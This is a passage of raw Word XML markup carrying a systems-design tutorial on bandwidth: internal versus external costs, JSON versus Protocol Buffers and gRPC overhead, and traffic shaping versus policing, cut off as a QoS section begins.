    <w:p w14:paraId="04C8349F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Internal vs External Bandwidth Budget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F976DA3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal bandwidth (east-west traffic between services):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Typically very high, very cheap. Within a data center: 25–100 Gbps per server, full bisection bandwidth (any server can reach any other server at full speed). Internal bandwidth constraints are rarely bandwidth itself but </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU overhead of network processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> (interrupts, memory copies, TLS encryption/decryption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F55D0B2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>External bandwidth (north-south traffic to clients):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Limited by internet uplink capacity, which is expensive. Every byte sent externally has a cost. This drives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A340545" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Aggressive response compression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BB0248" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>CDN offloading (serve from CDN, not origin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5953524E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Response pagination (don't send 10MB when 10KB is needed for the first screen).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C89657B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Binary protocols (Protocol Buffers, MessagePack vs JSON).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E071625" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>API field filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E96A07" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The asymmetry of bandwidth costs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35954744" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADBC270" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Internal data center bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBF0826" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  1Gbps port: ~$0 marginal cost (included in server cost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA85BE5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  10Gbps port: ~$500/month (NIC + switch port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA1B9B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05620B17" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>External internet bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D50158C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  1Gbps committed transit: $500–$2000/month + $0.005–$0.05/GB overage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24576B6F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C1576B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Ratio: internal is 10–100× cheaper than external per bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C437266" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>This asymmetry explains why systems move computation and aggregation to the server side — it's economically rational to do more internal processing to reduce external bandwidth usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02887452" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth in Microservices — The Serialization Tax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E32948" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Every microservice call involves </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>serialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> (converting in-memory objects to bytes) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>deserialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> (bytes back to objects). At high call rates, serialization is both a CPU bottleneck and a bandwidth consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B39189" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSON vs Protocol Buffers bandwidth comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E33892" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFDFFFF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>User object:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6152B400" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD04016" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  "user_id": 12345678,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C376EE6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  "username": "alice",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A63E68" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  "email": "alice@example.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B4CEE2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  "created_at": "2024-01-15T10:30:45Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2471894C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  "score": 98.7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ACF03E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  "active": true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8946E0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4070DCBC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="44D0FE93" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>JSON encoding: 142 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C324EC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Protocol Buffers: ~45 bytes (3× smaller)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796C2B34" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>MessagePack: ~85 bytes (1.7× smaller than JSON)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C24FF1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>FlatBuffers: ~60 bytes (no deserialization needed — direct memory access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A81B9AD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="6DBCF59D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>At 100K RPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05278B17" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  JSON: 142 bytes × 100,000 = 14.2 MB/s internal bandwidth per service pair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590F98FE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Protobuf: 45 bytes × 100,000 = 4.5 MB/s — 68% bandwidth reduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466D257C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The gRPC + Protocol Buffers combination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6443DE63" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>gRPC uses HTTP/2 framing (HPACK header compression) + Protocol Buffers payload encoding. For a microservice call with typical headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB75BBA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0746A74B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>REST + JSON:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8CAEFB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  HTTP/1.1 headers: ~400 bytes (repeated on every request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2198A4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  JSON body: 142 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE9B408" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Total: 542 bytes per request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AC527A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="74E4D54E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>gRPC + Protobuf:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D7FA04" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  HTTP/2 HPACK headers: ~50 bytes (most headers are indexed in dynamic table after first request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9F157D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Protobuf body: 45 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B08326E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  Total: ~95 bytes per request — 82% bandwidth reduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24836D85" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>At 1M RPS between two services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610D4CB3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>REST+JSON: 542 MB/s bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56445082" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>gRPC+Protobuf: 95 MB/s bandwidth — saves 447 MB/s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D17122" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>This bandwidth difference is significant for internal network capacity planning and for services running in cloud environments where internal bandwidth affects cross-AZ data transfer costs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEDDA07" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="11892DE1">
          <v:rect id="_x0000_i4475" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D20C9F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Bandwidth Management — Controlling Who Gets What</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063AED95" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traffic Shaping vs Traffic Policing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB91AFD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traffic policing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Enforces a hard bandwidth limit. Traffic exceeding the limit is </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dropped</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> (or marked for preferential dropping). No buffering of excess traffic. Immediate enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614D15AE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traffic shaping:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Enforces a bandwidth limit by </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>delaying</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> excess traffic — buffering it and releasing at the configured rate. Smooths bursty traffic into a uniform stream. No drops if the burst fits in the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65458FC5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A9776C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Traffic policing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58573191" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Incoming: burst of 1Gbps for 100ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24155E85" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Limit: 500Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7DBCC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Result: 500Mbps passes, 500Mbps dropped</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1805E4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  → applications experience packet loss → TCP retransmissions → throughput reduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA6BB11" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="796360B3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Traffic shaping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7481B7F2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Incoming: burst of 1Gbps for 100ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7AC81C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Limit: 500Mbps, buffer: 50MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145BA421" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Result: 500Mbps passes for 100ms, then buffer drains at 500Mbps for another 100ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB4442E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  → applications experience delayed packets (increased latency) but no loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A86969" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  → TCP doesn't retransmit → throughput maintained at 500Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E0ACAD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Which to use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714D1FEB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Policing</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> at network ingress: enforce hard limits, prevent one customer/flow from consuming more than their quota. Drops are acceptable — it's their problem for exceeding the limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CE679E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Shaping</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> for egress before a constrained link: smooth bursty application traffic to prevent overwhelming the link, avoiding drops at the link layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2769EBF2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QoS (Quality of Service) — Bandwidth Prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258D6AB3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>QoS mechanisms differentiate traffic and provide </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>differential service</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — ensuring high-priority traffic gets bandwidth even when the network is congested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4308F4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
